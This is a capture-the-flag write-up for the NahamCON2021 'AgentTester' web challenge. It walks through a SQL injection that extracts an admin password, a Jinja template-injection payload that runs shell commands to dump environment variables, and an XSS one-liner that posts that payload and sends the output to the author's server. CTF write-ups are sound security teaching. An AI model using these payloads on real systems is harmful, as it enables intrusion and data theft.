NahamCON2021 CTF / AgentTester Challenge / WriteUp

This weekend I have been playing a little bit with some of the challenges of the NathamCon2021 CTF. In the web category, I devoted some time to AgentTester. Even though it was initially tagged as «hard», then it was demoted to medium (surely enough because there was an unintended solution that I also took advantage of 🙂

AgentTester, designed by the great @jorgectf, includes a Dockerfile allowing you to test it using your personal docker container. 

First, you’ll need to build an image:

$ docker build -t agent-tester .

Double check that the images has been correctly built:

$ docker image ls
REPOSITORY                TAG       IMAGE ID       CREATED         SIZE
agent-tester              latest    58a61e41b476   3 minutes ago   1.45GB

And there you go. You can run your own web container, linked to tcp/3000:

Analyzing a little bit the source code of the Flask application,  we can see a simple web app with 4 route entries:

@app.route(«/», methods=[«GET»]) for the home

@app.route(«/debug», methods=[«POST»]) for debugging 

@app.route(«/profile/<int:user_id>», methods=[«GET», «POST»]) for profile management

@ws.route(«/req») This one sends a WebSocket message and initiates a request 

Let’s dig a little bit further:

/ route : it just shows the home page. There we can see a simple input text field and a Submit button. Reading the code it is clear that the user agent typed will be used to query a SQLite database in @ws.route(«/req»):

            query = db.session.execute(
                "SELECT userAgent, url FROM uAgents WHERE userAgent = '%s'" % uAgent

            uAgent = query["userAgent"]
            url = query["url"]

If there is a match, the associated URL will be visited by a headless chrome launched by this line:

 subprocess.Popen(["node", "browser/browser.js", url, uAgent])

That SQL query seems injectable, doesn’t it?

What do we have inside that SQLite database?

Oh, a user table, let’s see what’s inside…

And we also have an admin user. Let’s try to extract the password:

‘ union select password,’http://localhost’ from user where username=’admin

Here we go!

Now that we can impersonate the admin, let’s see what do we have in the /debug route:

@app.route("/debug", methods=["POST"])
def debug():
    sessionID = session.get("id", None)
    if sessionID == 1:
        code = request.form.get("code", "<h1>Safe Debug</h1>")
        return render_template_string(code)
        return "Not allowed."

Oh, admin has an ID=1, so no problem there. And the render_template_string() method seems SSTI injectable. Let’s check it…

Yep! This sentence did the trick:


And there we have, the CHALLENGE_FLAG is one of the environment variables, so we got the Flag using an unintended solution 🙂 Why is it unintended? Well, remember that we also have this unexplored route: 

@app.route("/profile/<int:user_id>", methods=["GET", "POST"]) for profile management

In fact, this profile page is a simple form with two fields, email and about. The later is somewhat  special because the author has added a suspicious security related comment near that input text: 

<div class="form-group">
          <label for="aboutInput">About</label>
          <!-- Let users set anything since only them can access their about. -->
          <input type="text" class="form-control" name="about" id="aboutInput"
          placeholder="A great haxor from <country>" value="{{ user.about|safe }}">

And, as you can see, it is XSS injectable. We can write whatever we want there due to the «|safe» clause.

Well, the AgentTesterv2 (hard web challenge, published after the unintended solution was unveiled) starts from here: the admin password is bcrypted so we can’t crack it. Now what? Well, my idea was the following: use the XSS to inject the following code:

fetch('http://vulnerable:3000/debug', {
  method: 'POST', // or 'PUT'
headers: new Headers({
             'Content-Type': 'application/x-www-form-urlencoded', 
  body: "code={{config.__class__.__init__.__globals__['os'].popen('env').read()}}",
.then(response => response.text())
.then(data => {
  console.log('Success:', data);
   resp = data;
.catch((error) => {
  console.error('Error:', error);

Or, more succinctly, this one-liner:

" autofocus onfocus="fetch('', {   method: 'POST',  headers: new Headers({              'Content-Type': 'application/x-www-form-urlencoded',      }),   body: 'code={{config.__class__.__init__.__globals__[\'os\'].popen(\'env\').read()}} ', }) .then(response => response.text()) .then(data => {   console.log('Success:', data);    resp = data;  new Image().src=''+resp;   })

As you can see, the field will get the (auto)focus and then run the XSS. It basically uses fetch to POST the STTI and exfiltrate the result to my own server (

Then, my idea was to instruct the headless chrome to visit this XSS profile, as follows:

' union select 'agente','

But,  unfortunately there is a flaw in my logic. Why? Well, first, let’s see what user is used to run the headless chrome: 

const puppeteer = require('puppeteer');
(async () => {
  const browser = await puppeteer.launch(
    {      args: [        '--no-sandbox',      ]    }
  const page = await browser.newPage();
  var url = process.argv[2];
  var uAgent = process.argv[3];
  var base_url = process.env.BASE_URL;

     'user-agent': uAgent,

  const cookies = [{
    'name': 'auth2',
    'value': '<REDACTED>',
    'domain': base_url,
    'httpOnly': true

The auth2 value of the cookie is set to the admin’s cookie. No problem here! you may think, the admin can access any profile, like the profile/2 URL in our case, can’t it? Well, the truth is that it can’t. In fact, each profile page can only be accessed by their own legitimate user.  So user_id=1 can’t access profile/2 or viceversa:

@app.route("/profile/<int:user_id>", methods=["GET", "POST"])
def profile(user_id):

    if == user_id:

And here we are, how to convince the crawler (run as user_id=1) to access a profile for user_id=2 that it is not supposed to be accessible… or how can I update the profile of user_id=1 as a user_id=2? No idea, man, but I’m eager to learn about it 🙂

Update: check the solution written by the author himself, this one by @lanjelot, and this one by @berji

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